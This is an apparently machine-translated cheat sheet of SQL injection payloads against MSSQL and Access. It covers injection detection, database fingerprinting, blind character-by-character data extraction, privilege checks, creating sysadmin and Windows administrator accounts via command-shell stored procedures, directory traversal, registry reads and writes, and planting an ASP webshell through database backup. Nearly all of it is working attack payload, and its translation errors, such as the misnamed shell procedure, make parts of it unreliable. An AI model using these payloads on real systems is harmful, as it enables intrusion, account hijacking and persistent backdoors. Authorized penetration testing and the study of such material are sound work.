1. Determine whether injection exists.
; And 1 = 1
; And 1 = 2
2. Determine whether it is mssql.
; And user> 0
3. Determine whether the injection parameter is a string (character) type.
And [query condition] and ''='
4. Determine whether parameters are filtered during search.
'And [query condition] and' % 25' ='
5. Determine the Database System
; And (select count (*) from sysobjects)> 0 mssql
; And (select count (*) from msysobjects)> 0 access
6. Guess the database
; And (Select Count (*) from [database name])> 0
7. Guess the field
; And (Select Count (field name) from database name)> 0
8. Guess the length of the value in the field.
; And (select top 1 len (field name) from database name)> 0
9. (1) Guess the ASCII value of a field character (Access)
; And (select top 1 asc (mid (field name, 1, 1) from database name)> 0
(2) Guess the ASCII value of a field character (MSSQL)
; And (select top 1 unicode (substring (field name, 1, 1) from database name)> 0
10. Test the permission structure (mssql)
; And 1 = (Select IS_SRVROLEMEMBER ('sysadmin '));--
; And 1 = (Select IS_SRVROLEMEMBER ('serveradmin '));--
; And 1 = (Select IS_SRVROLEMEMBER ('setupadmin '));--
; And 1 = (Select IS_SRVROLEMEMBER ('securityadmin '));--
; And 1 = (Select IS_SRVROLEMEMBER ('diskadmin '));--
; And 1 = (Select IS_SRVROLEMEMBER ('bulkadmin '));--
; And 1 = (Select IS_MEMBER ('db _ owner '));--
11. Add MSSQL and system accounts
; Exec master. dbo. sp_addlogin username ;--
; Exec master. dbo. sp_password null, username, password ;--
; Exec master. dbo. sp_addsrvrolemember sysadmin username ;--
; Exec master. dbo. xp_mongoshell 'net user username password/workstations: */times: all/passwordchg: yes/passwordreq: yes/active: yes/add ';--
; Exec master. dbo. xp_mongoshell 'net user username password/add ';--
; Exec master. dbo. xp_mongoshell 'net localgroup administrators username/add ';--
12. (1) traverse the directory
; Create table dirs (paths varchar (100), id int)
; Insert dirs exec master. dbo. xp_dirtree 'C :\'
; And (select top 1 paths from dirs)> 0
; And (select top 1 paths from dirs where paths not in ('obtained paths ')>)
(2) traverse directories
; Create table temp (id nvarchar (255), num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255 ));--
; Insert temp exec master. dbo. xp_availablemedia; -- get all current drives
; Insert into temp (id) exec master. dbo. xp_subdirs 'C: \ '; -- get the subdirectory list
; Insert into temp (id, num1) exec master. dbo. xp_dirtree 'C: \ '; -- get the directory tree structure of all subdirectories
; Insert into temp (id) exec master. dbo. xp_mongoshell 'Type c: \ web \ index. asp '; -- view the File Content
13. mssql Stored Procedures
Xp_regenumvalues registry Root Key, subkey
; Exec xp_regenumvalues 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ CurrentVersion \ run' returns all key values in multiple Record Sets
Xp_regread Root Key, subkey, key value name
; Exec xp_regread 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ currentversion', 'commonfilesdir', return the value of the specified key
Xp_regwrite Root Key, subkey, Value Name, value type, Value
There are two value types: REG_SZ and REG_DWORD.
; Exec xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ currentversion ',
'Testvaluename', 'reg _ sz ', 'Hello' write to the Registry
Xp_regdeletevalue Root Key, subkey, Value Name
Exec xp_regdeletevalue 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ currentversion', 'testvaluename' delete a value
Xp_regdeletekey 'HKEY _ LOCAL_MACHINE ', 'Software \ Microsoft \ Windows \ CurrentVersion \ testkey' delete key, including all values under this key
14. mssql backup creates webshell
Use model
Create table cmd (str image );
Insert into cmd (str) values ('<% Dim oScript %> ');
Backup database model to disk = 'C: \ l. asp ';
15. mssql built-in functions
; And (select @ version)> 0 to get the Windows version number
; And user_name () = 'dbo' determine whether the user connected to the current system is sa
; And (select user_name ()> 0 reveal the user connected to the current system
; And (select db_name ()> 0 to get the database currently connected
16. Simple webshell
Use model
Create table cmd (str image );
Insert into cmd (str) values ('<% = server. createobject ("wscript. shell "cmd.exe c (" cmd.exe/c "& request (" c ")). stdout. readall %> ');
Backup database model to disk = 'G: \ wwwtest \ l. asp ';